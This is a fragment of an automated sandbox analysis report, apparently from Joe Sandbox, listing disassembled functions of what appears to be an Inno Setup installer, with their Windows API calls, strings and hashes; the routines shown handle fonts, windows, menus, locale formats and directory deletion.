                                                              • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                              Function 004701FC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                              • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                              Strings
                                                              • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                              • AddFontResource, xrefs: 004702B5
                                                              • Failed to open Fonts registry key., xrefs: 00470281
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                              • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                              • API String ID: 955540645-649663873
                                                              • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                              • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                              • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                              • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                              Function 00462E30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                              • GetVersion.KERNEL32 ref: 00462E60
                                                              • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                              • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                              • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                              • String ID: Explorer
                                                              • API String ID: 2594429197-512347832
                                                              • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                              • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                              • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                              • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                              Function 00478370 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                              • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0), ref: 004783CC
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                              • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                              • API String ID: 2704155762-2318956294
                                                              • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                              • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                              • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                              • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                              Function 00459E0C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                              Strings
                                                              • Failed to strip read-only attribute., xrefs: 00459EA0
                                                              • Failed to delete directory (%d)., xrefs: 00459F68
                                                              • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                              • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                              • Stripped read-only attribute., xrefs: 00459E94
                                                              • Deleting directory: %s, xrefs: 00459E5B
                                                              • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorFindLast
                                                              • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                              • API String ID: 754982922-1448842058
                                                              • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                              • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                              • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                              • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                              Function 00422E50 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCapture.USER32 ref: 00422EA4
                                                              • GetCapture.USER32 ref: 00422EB3
                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                              • ReleaseCapture.USER32 ref: 00422EBE
                                                              • GetActiveWindow.USER32 ref: 00422ECD
                                                              • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                              • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                              • GetActiveWindow.USER32 ref: 00422FBF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CaptureMessageSend$ActiveWindow$Release
                                                              • String ID:
                                                              • API String ID: 862346643-0
                                                              • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                              • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                              • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                              • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                              Function 0042F290 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                              • GetActiveWindow.USER32 ref: 0042F2DA
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                              • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveLong$Message
                                                              • String ID:
                                                              • API String ID: 2785966331-0
                                                              • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                              • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                              • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                              • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                              Function 00429480 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042948A
                                                              • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                              • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                              • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 1583807278-0
                                                              • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                              • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                              • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                              • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                              Function 0041DE24 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0041DE27
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                              • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                              • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                              • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                              • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                              • String ID:
                                                              • API String ID: 225703358-0
                                                              • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                              • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                              • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                              • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                              Function 00463240 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                              • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load
                                                              • String ID: $ $Internal error: Item already expanding
                                                              • API String ID: 1675784387-1948079669
                                                              • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                              • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                              • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                              • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                              Function 00453D30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                              • API String ID: 390214022-3304407042
                                                              • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                              • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                              • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                              • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                              Function 00476C50 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                              • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                              • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ClassInfoLongMessageSendWindow
                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                              • API String ID: 3391662889-4234151509
                                                              • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                              • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                              • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                              • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                              Function 00408720 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$DefaultSystem
                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                              • API String ID: 1044490935-665933166
                                                              • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                              • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                              • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                              • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                              Function 004116F4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                              • String ID: ,$?
                                                              • API String ID: 2359071979-2308483597
                                                              • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                              • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                              • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                              • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                              Function 0041BE63 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                              • DeleteObject.GDI32(?), ref: 0041BF9F
                                                              • DeleteObject.GDI32(?), ref: 0041BFA8
                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                              • String ID:
                                                              • API String ID: 1030595962-0
                                                              • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                              • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
